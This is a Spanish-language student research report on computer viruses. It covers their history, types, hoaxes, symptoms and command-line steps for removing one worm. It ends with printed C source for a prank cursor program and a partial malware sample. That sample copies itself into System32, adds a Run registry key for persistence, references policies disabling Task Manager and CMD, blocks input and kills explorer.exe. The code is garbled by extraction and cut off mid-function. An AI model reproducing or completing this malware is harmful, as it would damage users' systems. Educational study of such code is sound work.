You are on page 1of 48

FACULTAD DE CIENCIAS Y TECNOLOGIA COMPONENTE: Investigacin II INTEGRANTES:

David Antonio Martnez Chavarra Jos Alfredo Luna Mungua Israel de Jess Lumbi lvarez Jorge

Profesora: Davinia Quiroz Grupo: No 2 Subgrupo: N0 1 Carrera: Ingeniera en Telemtica

JUEVES 09 DE SEPTIEMBRE DEL 2011

A LA LIBERTAD PIR LA UNIVERSIDAD!

INDICE

TEMA.3

INTRODUCCION.4

OBJETIVOS5

JUSTIFICACION.6

MARCO TEORICO Y ANTECENDENTES.7

ANEXOS.39

CRONOGRAMA..42

RECOMENDACIONES...43

CONCLUCIONES.46

GLOSARIO.47

BIBLIGRAGIA48

VIRUS INFORMATICOS

Introduccin
En la actualidad existen muchas personas usuarios de PC incluso personas que tienen algn ttulo en ramas de la computacin que desconocen la existencia de un sin nmero de virus que circulan da a da en nuestras computadoras los cuales su nica intencin es hacer dao, poniendo lentos los ordenadores, robando informacin, contraseas adems los virus alojados en las computadoras deterioran el sistema operativo y por ende avece tenemos que recurrir a lugares donde reparan PC por ignorancia porque bien nos pudimos evitar esos gastos innecesarios. Es por eso la importancia de estar al da con los virus no permitiendo que entren en nuestras PC y si lograsen entrar tener los conocimientos bsicos para detectarlos y proceder a eliminarlos a travs de tcnicas y software que nos podran ayudar.

OBJETIVOS GENERALES: Conocer las herramientas informticas para garantizar la seguridad de nuestros ficheros guardados en nuestras computadoras

ESPECIFICOS: Detectar cuando los virus contaminan las Computadoras Conocer alguna caractersticas de los virus y las herramientas para contrarrestarlo

Garantizar seguridad a nuestros ficheros

JUSTIFICACION: El desarrollo de este trabajo dirigido a todos los usuarios de Computadoras est hecho con el fin de informar y demostrar la peligrosidad que representan los virus en nuestras computadoras por todo ello suministraremos algunos mtodos y tcnicas eficaces para contrarrestar que los virus infesten nuestro Sistema Operativos y Documentos importantes. Adems brindaremos al lector la informacin de algunos software (antivirus) para escoja al que ms se adapte a sus necesidades y los recursos con que cuenta su o sus propias computadoras.

MARCO TEORICO

CMO NACIERON LOS VIRUS? Hacia finales de los aos 60, Douglas McIlory, Victor Vysottsky y Robert Morris idearon un juego al que llamaron Core War (Guerra en lo Central, aludiendo a la memoria de la computadora), que se convirti en el pasatiempo de algunos de los programadores de los laboratorios Bell de AT&T. El juego consista en que dos jugadores escribieran cada uno un programa llamado organismo, cuyo hbitat fuera la memoria de la computadora. A partir de una seal, cada programa intentaba forzar al otro a efectuar una instruccin invlida, ganando el primero que lo consiguiera. Al trmino del juego, se borraba de la memoria todo rastro de la batalla, ya que estas actividades eran severamente sancionadas por los jefes por ser un gran riesgo dejar un organismo suelto que pudiera acabar con las aplicaciones del da siguiente. De esta manera surgieron los programas destinados a daar en la escena de la computacin. Uno de los primeros registros que se tienen de una infeccin data del ao 1987, cuando en la Universidad estadounidense de Delaware notaron que tenan un virus porque comenzaron a ver " Brain" como etiqueta de los disquetes. La causa de ello era Brain Computer Services, una casa de computacin paquistan que, desde 1986, venda copias ilegales de software comercial infectadas para, segn los responsables de la firma, dar una leccin a los piratas. Ellos haban notado que el sector de booteo de un disquete contena cdigo ejecutable, y que dicho cdigo se ejecutaba cada vez que la mquina se inicializaba desde un disquete. Lograron reemplazar ese cdigo por su propio programa, residente, y que este instalara una rplica de s mismo en cada disquete que fuera utilizado de ah en ms. Tambin en 1986, un programador llamado Ralf Burger se dio cuenta de que un archivo poda ser creado para copiarse a s mismo, adosando una copia de l a otros archivos. Escribi una demostracin de este efecto a la que llam VIRDEM, que poda infectar cualquier archivo con extensin .COM. Esto atrajo tanto inters que se le pidi que escribiera un libro, pero, puesto que l desconoca lo que estaba ocurriendo en Paquistn, no mencion a los virus de sector de arranque (boot sector). Para ese entonces, ya se haba empezado a diseminar el virus Vienna. Actualmente, los virus son producidos en cantidades extraordinarias por muchisima gente alrededor del planeta. Algunos de ellos dicen hacerlo por divertimento, otros quizs para probar sus habilidades. De cualquier manera, hasta se ha llegado a notar un cierto grado de competitividad entre los autores de estos programas.

Con relacin a la motivacin de los autores de virus para llevar a cabo su obra, existe en Internet un documento escrito por un escritor freelance Markus Salo, en el cual, entre otros, se exponen los siguientes conceptos:

Algunos de los programadores de virus, especialmente los mejores, sostienen que su inters por el tema es puramente cientfico, que desean averiguar todo lo que se pueda sobre virus y sus usos. A diferencia de las compaas de software, que son organizaciones relativamente aisladas unas de otras (todas tienen secretos que no querran que sus competidores averiguaran) y cuentan entre sus filas con mayora de estudiantes graduados, las agrupaciones de programadores de virus estn abiertas a cualquiera que se interese en ellas, ofrecen consejos, camaradera y pocas limitaciones. Adems, son libres de seguir cualquier objetivoque les parezca, sin temer por la prdida de respaldo econmico. El hecho de escribir programas vrales da al programador cierta fuerza coercitiva, lo pone fuera de las reglas convencionales de comportamiento. Este factor es uno de los ms importantes, pues el sentimiento de pertenencia es algo necesario para todo ser humano, y es probado que dicho sentimiento pareciera verse reforzado en situaciones marginales. Por otro lado, ciertos programadores parecen intentar legalizar sus actos poniendo sus creaciones al alcance de mucha gente, (va Internet, BBS especializadas, etc.) haciendo la salvedad de que el material es peligroso, por lo cual el usuario debera tomar las precauciones del caso. Existen programadores, de los cuales, generalmente, provienen los virus ms destructivos, que alegan que sus programas son creados para hacer notoria la falta de proteccin de que sufren la mayora de los usuarios de computadoras. La gran mayora de estos individuos son del mismo tipo de gente que es reclutada por los grupos terroristas: hombres, adolescentes, inteligentes.

En definitiva, sea cual fuere el motivo por el cual se siguen produciendo virus, se debe destacar que su existencia no ha sido slo perjuicios: gracias a ellos, mucha gente a tomado conciencia de qu es lo que tiene y cmo protegerlo.

QU ES UN VIRUS?.

Es un pequeo programa escrito intencionalmente para instalarse en la computadora de un usuario sin el conocimiento o el permiso de este. Decimos que es un programa parsito porque el programa ataca a los archivos o sector es de "booteo" y se replica a s mismo para continuar su esparcimiento. Algunos se limitan solamente a replicarse, mientras que otros pueden producir serios daos que pueden afectar a los sistemas. Se ha llegado a un punto tal, que un nuevo virus llamado W95/CIH-10xx. o tambin como CIH.Spacefiller (puede aparecer el 26 de cada mes, especialmente 26 de Junio y 26 de Abril) ataca al BIOS de la PC husped y cambiar su configuracin de tal forma que se requiere cambiarlo. Nunca se puede asumir que un virus es inofensivo y dejarlo "flotando" en el sistema.

Existen ciertas analogas entre los virus biolgicos y los informticos: mientras los primeros son agentes externos que invaden clulas para alterar su informacin gentica y reproducirse, los segundos son programas-rutinas, en un sentido ms estricto, capaces de infectar archivos de computadoras, reproducindose una y otra vez cuando se accede a dichos archivos, daando la informacin existente en la memoria o alguno de los dispositivos de almacenamiento del ordenador. Tienen diferentes finalidades: Algunos slo 'infectan', otros alteran datos, otros los eliminan, algunos slo muestran mensajes. Pero el fin ltimo de todos ellos es el mismo: PROPAGARSE. Es importante destacar que el potencial de dao de un virus informtico no depende de su complejidad sino del entorno donde acta. La definicin ms simple y completa que hay de los virus corresponde al modelo D. A. S., y se fundamenta en tres caractersticas, que se refuerzan y dependen mutuamente. Segn ella, un virus es un programa que cumple las siguientes pautas:

Es daino Es autor reproductor Es subrepticio

El hecho de que la definicin imponga que los virus son programas no admite ningn tipo de observacin; est extremadamente claro que son programas, realizados por personas. Adems de ser programas tienen el fin ineludible de causar dao en cualquiera de sus formas. Asimismo, se pueden distinguir tres mdulos principales de un virus informtico:

Mdulo de Reproduccin Mdulo de Ataque Mdulo de Defensa

El mdulo de reproduccin se encarga de manejar las rutinas de "parasitacin" de entidades ejecutables (o archivos de datos, en el caso de los virus macro) a fin de que el virus pueda ejecutarse subrepticiamente. Pudiendo, de esta manera, tomar control del sistema e infectar otras entidades permitiendo se traslade de una computadora a otra a travs de algunos de estos archivos. El mdulo de ataque es optativo. En caso de estar presente es el encargado de manejar las rutinas de dao adicional del virus. Por ejemplo, el conocido virus Michelangelo, adems de producir los daos que se detallarn ms adelante, tiene un mdulo de ataque que se activa cuando el reloj de la computadora indica 6 de Marzo. En estas condiciones la rutina acta sobre la informacin del disco rgido volvindola inutilizable. El mdulo de defensa tiene, obviamente, la misin de proteger al virus y, como el de ataque, puede estar o no presente en la estructura. Sus rutinas apuntan a evitar todo aquello que provoque la remocin del virus y retardar, en todo lo posible, su deteccin.

TIPOS DE VIRUS.

Los virus se clasifican por el modo en que actan infectando la computadora:


Programa: Infectan archivos ejecutables tales como .com / .exe / .ovl / .drv / .sys / .bin Boot: Infectan los sectores Boot Record, Master Boot, FAT y la Tabla de Particin. Mltiples: Infectan programas y sectores de "booteo". Bios: Atacan al Bios para desde all reescribir los discos duros. Hoax: Se distribuyen por e-mail y la nica forma de eliminarlos es el uso del sentido comn.

Al respecto, se trata de virus que no existe y que se utiliza para aterrar a los novatos especialmente en la Internet a pesar que los rumores lo muestran como algo muy serio y a veces la informacin es tomada por la prensa especializada. Por lo general, como ya se expres, la difusin se hace por cadenas de e-mail con terribles e inopinadas advertencias. En realidad el nico virus es el mensaje. A continuacin se dan una serie de supuestos "virus", por lo que es aconsejable ignorar los mensajes que aparecen y no ayudar a replicarlos continuando con la cadena:

3b Trojan (alias PKZIP Virus). AOL4Free Virus Hoax. Baby New Year Virus Hoax. BUDDYLST.ZIP BUDSAVER.EXE Budweiser Hoax Death69 Deeyenda E-Flu FatCat Virus Hoax Free Money Get More Money Hoax Ghost Good Times Hacky Birthday Virus Hoax Hairy Palms Virus Hoax Irina Join the Crew Londhouse Virus Hoax Microsoft Virus Hoax Millenium Time Bomb Penpal Greetings Red Alert Returned or Unable to Deliver Teletubbies Time Bomb Very Cool Win a Holiday

10

World Domination Hoax Yellow Teletubbies A.I.D.S. hoax email virus AltaVista virus scare AOL riot hoax email ASP virus hoax Back Orifice Trojan horse Bill Gates hoax Bloat, see MPEG virus hoax Budweiser frogs screen-saver scare Good Times hoax email virus Irina hoax virus Java virus scare Join the Crew hoax email virus 'Millennium' virus misunderstanding MPEG virus hoax 'My clock says 2097/2098' virus misunderstanding New virus debug device hoax email virus with attached Trojan horse Open: Very Cool, see A.I.D.S. hoax email virus Penpal Greetings, see Good Times hoax email virus PKZ300 Trojan virus scare Returned or Unable to Deliver hoax email virus Walt Disney greeting, see Bill Gates hoax Win a Holiday hoax email virus Windows 98 MS Warning.

MAS TIPOS:

1.- Trampas (trap door) Se conocen tambin como puertas traseras (back door). Consisten en un conjunto de instrucciones no documentadas dentro de un programa o sistema operativo, que permiten acceso sin pasar o dejar rastro en los controles de seguridad. Normalmente son vas de entrada que dejan los programadores, en forma deliberada, para uso particular.

2.-Bombas Lgicas Corresponden al cdigo oculto dentro de una aplicacin que se activa cuando se cumplen determinadas condiciones. Por ejemplo una fecha u hora, tras un determinado nmero de operaciones, secuencia de teclas o comandos, etc. Ejemplos de este tipo de programas son virus como Viernes 13 o el virus Miguel Angel

11

3.-Caballos de Troya Son programas aparentemente tiles, que contienen cdigo oculto programado para ejecutar acciones no esperadas y generalmente indeseables sobre el computador. Un ejemplo simple de un Caballo de Troya es un programa que hace las veces de una til calculadora, pero, en la medida que es usada, borra o corrompe archivos del disco duro, sin que el usuario se percate.

4.-Bacterias Son aquellos programas cuyo objetivo es replicarse dentro de un sistema, consumiendo memoria y capacidad del procesador, hasta detener por completo la mquina.

5.-Gusanos Los gusanos utilizan las redes de comunicaciones para expandirse de sistema en sistema. Es decir, una vez que un gusano entra a un sistema examina las tablas de ruta, correo u otra informacin sobre otros sistemas, a fin de copiarse en todos aquellos sistemas sobre los cuales encontr informacin. Este mtodo de propagacin presenta un crecimiento exponencial con lo que puede infectar en muy corto tiempo a una red

12

completa. Existen bsicamente 3 mtodos de propagacin en los gusanos: - Correo electrnico - El gusano enva una copia de s mismo a todos los usuarios que aparecen en las libretas de direcciones que encuentra en el computador dnde se ha instalado. - Mecanismos basados en RPC (Remote Procedure Call) - El gusano ejecuta una copia de s mismo en todos los sistemas que aparecen en la tabla de rutas (rcopy y rexecute). - Mecanismos basados en RLOGIN - El gusano se conecta como usuario en otros sistemas y una vez en ellos, se copia y ejecuta de un sistema a otro.

6.-Virus El virus informtico es el programa diseado para autorreplicarse y ejecutar acciones no deseadas dentro del computador. Cuando un archivo infectado es ejecutado o el computador arranca desde un disquete infectado, el virus es ejecutado, permaneciendo en memoria e infectando todos los programas que se ejecuten y todos los discos que se accedan de ah en adelante. Podemos encontrar los siguientes tipos de virus: - Virus de Archivos : Esta clase de virus slo se activa cuando un programa infectado es ejecutado. Estos virus atacan principalmente a archivos con extensin *.COM y *.EXE, aunque tambin pueden infectar las extensiones *.DRV, *.DLL, *.BIN, *.OVL, *.SYS, *.386, *.OVY, *.SCR, *.PIF y otras.

13

- Virus de Sector de arranque (boot) : Estos virus atacan el sector de arranque, registro maestro de arranque (Master Boot Record, MBR) y la tabla de localizacin de archivos (File Allocation Table, FAT) de las unidades de disco, ya sean estas fijas o removibles. Estos virus se activan cuando el PC se inicializa desde una unidad de disco infectada, alojndose en todas las unidades de disco que se utilicen en el equipo desde ese instante. - Virus Multi Particin : Bajo este nombre se engloban los virus que utilizan los dos mtodos anteriores. Es decir, pueden simultneamente infectar archivos, sectores bootde arranque y tablas FAT. - Retrovirus : Un Retrovirus es un virus informtico, que intenta evitar o esconder la operacin de un programa antivirus. El ataque puede ser especfico a un antivirus o en forma genrica. Normalmente los retrovirus no son dainos en s. Bsicamente su funcin consiste en despejar el camino para la entrada de otros virus realmente destructivos, que lo acompaan en el cdigo. - Macro Virus : Estos virus infectan documentos escritos con Microsoft Word, con Excel y otras aplicaciones similares y son los primeros virus conocidos multiplataforma, es decir, infectan tanto PC's como sistemas Macintosh. La vulnerabilidad a este tipo de virus es muy alta, debido a que los documentos son mucho ms "mviles" que los programas ejecutables y adems, los macro virus son muy fciles de escribir y/o modificar, lo que hace que su crecimiento y la cantidad de variantes sea muy grande.

14

7.-Encriptados: Ms que un tipo de virus, se trata de una tcnica que stos pueden utilizar. Por este motivo, los virus que la utilizan (pudiendo pertenecer a otros tipos o categoras), se suelen denominar tambin encriptados. Esto es, el virus se cifra, codifica o "encripta" a s mismo para no ser fcilmente detectado por los programas antivirus. Para realizar sus actividades, el virus se descifra a s mismo y cuando ha finalizado, se vuelve a cifrar.

8.-Polimrficos: Son virus que emplean una nueva tcnica para dificultar su deteccin por parte de los programas antivirus (generalmente, son los virus que ms cuesta detectar). En este caso varan en cada una de las infecciones que llevan a cabo. De esta forma, generan una elevada cantidad de copias de s mismos. Los virus polimrficos se encriptan o cifran de forma diferente (utilizando diferentes algoritmos y claves de cifrado), en cada una de las infecciones que realizan. Esto hace que no se puedan detectar a travs de la bsqueda de cadenas o firmas (ya que stas sern diferentes en cada cifrado).

9.-Bulos (hoax) Un hoax no es unvirus, es un mensaje de correo electrnico que informa sobre la aparicin de un nuevo y extremadamente peligroso virus. Pero en realidad, un hoax es una broma, ese virus que anuncia no existe, su nica pretensin es llegar a cuanta ms gente mejor. Los hoax presentan las siguientes caractersticas: - Son mensajes extremadamente serios; intentan provocar un miedo atroz entre los usuarios - Siempre estn avalados por alguna persona o entidad seria y de reconocido prestigio (IBM, Microsoft, AOL, Netscape, ...) - Son extremadamente catastrofistas. Textos como "...Le borrar toda la informacin

15

de su disco duro...", "...Le destrozar su disco duro..." son habituales en los hoax - Suelen incluir lneas en las que le pide que enve este mensaje a todos sus conocidos para alertarles sobre el peligro Muchas de las personas que reciben este tipo de mensajes creen que esta informacin es verdadera. Todo esto provoca la falsa alarma entre los usuarios que van recibiendo los mensajes, la propagacin de las direcciones de correo de nuestros conocidos y en definitiva todos nuestros contactos, as como el crecimiento de informacin "basura" por internet.

10.-Joke Los jokes no se pueden considerar tampoco como virus. Al igual como los hoax son bromas. Concretamente, los jokes son programas que tienen como principal objetivo hacer pensar al usuario que han sido infectados por un virus. Estos programas tratan de simular los efectos destructivos de un virus, como por ejemplo borrar todos los archivos del disco, girar la pantalla del monitor, derretir la pantalla, abrir la puerta del CD-ROM, etc. Los objetivos de los jokes van desde el simple entretenimiento de los usuarios en su trabajo diario hasta intentar alarmar al usuario que los ejecuta. Los jokes son programas ejecutables principalmente descargados de internet o recibidos por correo electrnico. Se caracterizan por ser sugestivos tanto por el dibujo de su icono y su nombre.

Por ltimo, cabe destacar que los HOAX estn diseados nicamente para asustar a los novatos (y a los que no lo son tanto). Otros como el mensaje del carcinoma cerebral de Jessica, Jessica Mydek, Anabelle, Ana, Billy y otros personajes imaginarios tampoco son reales como tampoco lo es ladireccin , ya que fueron creados para producir congestionamiento en la Internet CARACTERISTICAS El virus es un pequeo software (cuanto ms pequeo ms fcil de esparcir y ms difcil de detectar), que permanece inactivo hasta que un hecho externo hace que el programa sea ejecutado o el sector de "booteo" sea ledo. De esa forma el programa del virus es activado y se carga en la memoria de la computadora, desde donde puede esperar un evento que dispare su sistema de destruccin o se replique a s mismo. Los ms comunes son los residentes en la memoria que pueden replicarse fcilmente en los programas del sector de "booteo", menos comunes son los no-residentes que no permanecen en la memoria despus que el programahuesped es cerrado. Los virus pueden llegar a "camuflarse" y esconderse para evitar la deteccin y reparacin. Como lo hacen:

16

a. El virus re-orienta la lectura del disco para evitar ser detectado; b. Los datos sobre el tamao del directorio infectado son modificados en la FAT, para evitar que se descubran bytes extra que aporta el virus; c. encriptamiento: el virus se encripta en smbolos sin sentido para no ser detectado, pero para destruir o replicarse DEBE desencriptarse siendo entonces detectable; d. polimorfismo: mutan cambiando segmentos del cdigo para parecer distintos en cada "nueva generacin", lo que los hace muy difciles de detectar y destruir; e. Gatillables: se relaciona con un evento que puede ser el cambio de fecha, una determinada combinacin de tecleo; un macro o la apertura de un programa asociado al virus (Troyanos). f. Unirse a un programa instalado en el ordenador permitiendo su propagacin. g. Mostrar en la pantalla mensajes o imgenes humorsticas, generalmente molestas. h. Ralentizar o bloquear el ordenador. i. Destruir la informacin almacenada en el disco, en algunos casos vital para el sistema, que impedir el funcionamiento del equipo. j. Reducir el espacio en el disco. k. Molestar al usuario cerrando ventanas, moviendo el ratn... Los virus se transportan a travs de programas tomados de BBS (Bulletin Boards) o copias de software no original, infectadas a propsito o accidentalmente. Tambin cualquier archivo que contenga "ejecutables" o "macros" puede ser portador de un virus: downloads de programas de lugares inseguros; e-mail con "attachments", archivos de MS-Word y MS-Excel con macros. Inclusive ya existen virus que se distribuyen con MS-Power Point. Los archivos de datos, texto o Html NO PUEDEN contener virus, aunque pueden ser daados por estos. Los virus de sectores de "booteo" se instalan en esos sectores y desde all van saltando a los sectores equivalentes de cada uno de los drivers de la PC. Pueden daar el sector o sobreescribirlo. Lamentablemente obligan al formateo del disco del drive infectado. Incluyendo discos de 3.5" y todos los tipos de Zip de Iomega, Sony y 3M. (No crean vamos a caer en el chiste fcil de decir que el ms extendido de los virus de este tipo se llama MS Windows 98). En cambio los virus de programa, se manifiestan cuando la aplicacin infectada es ejecutada, el virus se activa y se carga en la memoria, infectando a cualquier programa que se ejecute a continuacin. Puede solaparse infecciones de diversos virus que pueden ser destructivos o permanecer inactivos por largos periodos de tiempo

DAOS DE LOS VIRUS. Definiremos dao como accin una indeseada, y los clasificaremos segn la cantidad de tiempo necesaria para reparar dichos daos. Existen seis categoras de daos hechos por los virus, de acuerdo a la gravedad.

17

a. Sirva como ejemplo la forma de trabajo del virus FORM (el ms comn): En el da 18 de cada mes cualquier tecla que presionemos hace sonar el beep. Deshacerse del virus implica, generalmente, segundos o minutos. b. DAOS TRIVIALES. Un buen ejemplo de este tipo de dao es el JERUSALEM. Este virus borra, los viernes 13, todos los programas que uno trate de usar despus de que el virus haya infectado la memoria residente. En el peor de los casos, tendremos que reinstalar los programas perdidos. Esto nos llevar alrededor de 30 minutos. c. DAOS MENORES. Cuando un virus formatea el disco rgido, mezcla los componentes de la FAT (File Allocation Table, Tabla de Ubicacin de Archivos), o sobreescribe el disco rgido. En este caso, sabremos inmediatamente qu es lo que est sucediendo, y podremos reinstalar el sistema operativo y utilizar el ltimo backup. Esto quizs nos lleve una hora. d. DAOS MODERADOS. Algunos virus, dada su lenta velocidad de infeccin y su alta capacidad de pasar desapercibidos, pueden lograr que ni an restaurando un backup volvamos al ltimo estado de los datos. Un ejemplo de esto es el virus DARK AVENGER, que infecta archivos y acumula la cantidad de infecciones que realiz. Cuando este contador llega a 16, elige un sector del disco al azar y en l escribe la frase: "Eddie lives somewhere in time" (Eddie vive en algn lugar del tiempo). Esto puede haber estado pasando por un largo tiempo sin que lo notemos, pero el da en que detectemos la presencia del virus y queramos restaurar el ltimo backup notaremos que tambin l contiene sectores con la frase, y tambin los backups anteriores a ese. Puede que lleguemos a encontrar un backup limpio, pero ser tan viejo que muy probablemente hayamos perdido una gran cantidad de archivos que fueron creados con posterioridad a ese backup. e. DAOS MAYORES. Los daos severos son hechos cuando un virus realiza cambios mnimos, graduales y progresivos. No sabemos cundo los datos son correctos o han cambiado, pues no hay pistas obvias como en el caso del DARK AVENGER (es decir, no podemos buscar la frase Eddie lives ...). f. DAOS SEVEROS. g. DAOS ILIMITADOS. Algunos programas como CHEEBA, VACSINA.44.LOGIN y GP1 entre otros, obtienen la clave del administrador del sistema y la pasan a un tercero. Cabe aclarar que estos no son virus sino troyanos. En el caso de CHEEBA, crea un nuevo usuario con los privilegios mximos, fijando el nombre del usuario y la clave. El dao es entonces realizado por la tercera persona, quien ingresar al sistema y hara lo que quisiera.

18

SNTOMAS TPICOS DE UNA INFECCIN.

El sistema operativo o un programa toma mucho tiempo en cargar sin razn aparente. El tamao del programa cambia sin razn aparente. El disco duro se queda sin espacio o reporta falta de espacio sin que esto sea necesariamente as. Si se corre el CHKDSK no muestra "655360 bytes available". En Windows aparece "32 bit error". La luz del disco duro en la CPU continua parpadeando aunque no se este trabajando ni haya protectores de pantalla activados. (Se debe tomar este sntoma con mucho cuidado, porque no siempre es as). No se puede "bootear" desde el Drive A, ni siquiera con los discos de rescate. Aparecen archivos de la nada o con nombres y extensiones extraas. Suena "clicks" en el teclado (este sonido es particularmente aterrador para quien no esta advertido). Los caracteres de texto se caen literalmente a la parte inferior de la pantalla (especialmente en DOS). En la pantalla del monitor pueden aparecen mensajes absurdos tales como "Tengo hambre. Introduce un Big Mac en el Drive A". En el monitor aparece una pantalla con un fondo de cielo celeste, unas nubes blancas difuminadas, una ventana de vidrios repartidos de colores y una leyenda en negro que dice Windows 98 (No puedo evitarlo, es mas fuerte que yo...!!). Una infeccin se soluciona con las llamadas "vacunas" (que impiden la infeccin) o con los remedios que desactivan y eliminan, (o tratan de hacerlo) a los virus de los archivos infectados. Hay cierto tipo de virus que no son desactivables ni removibles, por lo que se debe destruir el archivo infectado.

COMO ELIMINAR LOS VIRUS? Podemos Eliminarlos haciendo usos de antivirus . He aqu algunos de ellos: Kaspersky Anti-virus F-Secure AVAST! Avira Antivirus ESETNOD32 Norton O bien lo puedes eliminar desde la consola del sistema Para ello haga lo siguiente:

19

Esto es lo que se debe hacer en la Unidad C:


1. Finalizar los procesos activos del virus, osea los ejecutables: amvo.exe y avpo.exe desde la lnea de comandos(Inicio-Ejecutarescribir CMD y luego aceptar):

taskkill /f /im amvo.exe taskkill /f /im avpo.exe


2. Quitar los atributos de sistema, de oculto y de slo lectura a los

archivos mencionados, esto se logra usando los siguientes comandos desde la consola: attrib -s -h -r C:\autorun.inf attrib -s -h -r C:\ntdeiect.com attrib -s -h -r C:\n1detect.com attrib -s -h -r C:\n?deiect.com attrib -s -h -r C:\nideiect.com attrib -s -h -r C:\nide?ect.com attrib -s -h -r C:\uxde?ect.com
3. Proceder a la eliminacin de estos archivos usando el comando delete con la opcin /f para forzar el borrado, la opcin /q para borrar sin pedir confirmacin y la opcin /a para indicar que son archivos

con atributos los que se van a eliminar, desde la lnea de comandos: del C:\autorun.inf /f /q /a del C:\ntdeiect.com /f /q /a del C:\n1detect.com /f /q /a del C:\n1deiect.com /f /q /a del C:\nide?ect.com /f /q /a del C:\uxde?ect.com /f /q /a
4. Ahora quitamos los permisos de solo lectura, oculto y sistema a

los archivos que quedaron en la carpeta C:\windows\system32: attrib -s -h -r c:\windows\system32\amvo.exe attrib -s -h -r c:\windows\system32\avpo.exe attrib -s -h -r c:\windows\system32\amvo0.dll attrib -s -h -r c:\windows\system32\amvo1.dll attrib -s -h -r c:\windows\system32\avpo0.dll attrib -s -h -r c:\windows\system32\avpo1.dll

20

5. Una vez quitados los atributos procedemos a eliminar los

archivos del virus de la carpeta C:\windows\system32: del /f c:\windows\system32\amvo.exe del /f c:\windows\system32\avpo.exe del /f c:\windows\system32\amvo0.dll del /f c:\windows\system32\amvo1.dll del /f c:\windows\system32\avpo0.dll del /f c:\windows\system32\avpo1.dll
6. Ahora borramos del registro los valores creados por el virus para

evitar su ejecucin autmatica al inicio del sistema, desde la lnea de comandos: reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersio n\Run\ /v amva /f reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersio n\Run\ /v avpo /f
7. Y restauramos la opcin de poder ver los archivos ocultos y de

sistema, desde la lnea de comandos: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersio n\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 1 /f
8. Repetir los pasos 1-7 en todas las unidades. 9. Reiniciar el computador.

Attrib /d /s -r -h -s *.*

Attrib: Para visualizar o modificar atributos /d: Para poder procesar carpetas /s: Para poder procesar subcarpetas -r: Quitar atributos de solo lectura -h: Quitar atributos de oculto -s: Quitar atributos de sistema *.*: Para archivos de cualquier nombre, con cualquier extension

21

NOTA Si su ordenador se infect con virus, spyware y le es difcil desinfectarlo, le recomendamos realizar las siguientes indicaciones, para una eliminacin efectiva de estos parsitos informticos Manual Windows XP aqu Tutorial Windows XP Home Edition aqu 1. Reiniciar en "Modo Seguro" o "Modo a Prueba de Fallos": Inicie en "Modo Seguro" (XP, 2000, 2003, Vista, 7) informacin O en "Modo a Prueba de Fallos" (para Win 9X) informacin O en "Modo a Prueba de Errores" (Para Win Me) informacin
ALGUNOS CODIGOS FUENTES DE LOS VIRUS INFORMATICOS:
#include <windows.h>

int main() { FreeConsole(); srand(GetTickCount()); int nWidth = GetSystemMetrics(SM_CXSCREEN) - 1;

int nHeight = GetSystemMetrics(SM_CYSCREEN) - 1; while(!GetAsyncKeyState(VK_F8)){ SetCursorPos((rand() % nWidth) + 1, (rand() % nHeight) + 1); Sleep(5); } return 0; }

#include <windows.h> //Para poder agregar la entrada al registro 002 003 #include <winable.h> //Esto es para BlockInput(); #include <tlhelp32.h>

22

004 005 006 007

#include <stdio.h>

char hacko[1024]="Error en el systema!!!n -

Se ha producira un Memory Leak :P Hacko"; 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 void VirusCopy() { char path[256]; char nombre[60]="wnws"; char* ruta=getenv("windir"); //obtiene la ruta de la instalacion de windows strcat(ruta,"System32"); //agrega System32 a la ruta strcat(nombre,".exe"); //agrega .exe a wnws strcat(ruta,nombre); //agrega wnws.exe a C:WINDOWSSystem32 HMODULE exe = GetModuleHandle(0); char* explorerEnd="explorer.exe"; char* die1="DisableCMD"; char* die2="DisableTaskMgr"; char* die3="DisableRegistryTools"; char* die4="NoControlPanel"; char* die5="NoRun";

23

028

//nos retornara un handle al archivo usado para crear el proc

eso de llamada 029 030 031 032 033 034 035 036 037 038 039 040 bool OnRun() //Comprueba si el virus ha infectado el registro { char cadena[256]; DWORD cadena2 = sizeof(cadena); HKEY revisar; if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWAREMicrosoftWindowsC GetModuleFileName(exe, path, 256); //obtien la ruta de si mismo CopyFile(path,ruta,false); //se copia a la carpeta System32 }

urrentVersionRun",0,KEY_QUERY_VALUE,&revisar)) 041 {//Si no se abre la clave devolver false para indicar que no

existe 042 043 044 return false; } ZeroMemory(cadena,cadena2);//Pone en 0 ambas cadenas y le da

el tipo DWORD a cadena 045 if(RegQueryValueEx(revisar,"Windows Network Service",0,NULL,(

PBYTE)cadena,&cadena2)) 046 047 {//si esta infectado cadena guarda el valor alfanumerico RegCloseKey(revisar);

24

048

return false;//Devolver false porque aun no esta infectado el

registro 049 050 051 052 053 } else { RegCloseKey(revisar); return true;//Se devuelve true porque el registro ya esta inf

ectado 054 }

055 056 057 058 059 060 061 062

} void VirusOnRegedit() { while (OnRun()==false) { char* dir=getenv("windir"); HKEY agregar; RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SoftwareMicrosoftWindowsCurr

entVersionrun",0,KEY_SET_VALUE,&agregar); 063 RegSetValueEx(agregar,"Windows Network Service",0,REG_SZ,(con

st unsigned char*)dir,28); 064 065 066 RegCloseKey(agregar); } MessageBox(0, hacko, "Estas infectado por el virus Blocked",

MB_OK|MB_ICONERROR); 067 }

25

068 069 070 071 072 073 074 075 076 077 078 079 080 081 ); 082 083 084 085 086 087 088 089 090 091

void NoInputStupid() { FreeConsole();//oculta la consola win32 BlockInput(true); //bloqueara el teclado y el mouse Sleep(20000); BlockInput(false); } void hackoKillsExplorerOfBillGates(char* proceso) { FreeConsole(); HANDLE procesoShot; PROCESSENTRY32 pe32; int result=0; procesoShot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0

if( procesoShot == INVALID_HANDLE_VALUE ){ printf( TEXT("CreateToolhelp32Snapshot (of processes)") ); } pe32.dwSize = sizeof( PROCESSENTRY32 ); if( !Process32First( procesoShot, &pe32 ) ) { printf(TEXT("Process32First")); CloseHandle( procesoShot ); } do

26

092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109

{ if(strcmp(proceso,pe32.szExeFile )==0) { result=1; break; } } while( Process32Next( procesoShot, &pe32 ) ); if(result==1) system("taskkill /f /im explorer.exe");

CloseHandle( procesoShot ); } void MemoryLeak() { FreeConsole(); char *x; //1 Byte en Memoria while(1) x = new char; // Sectoriza el byte desde el heap y produce un

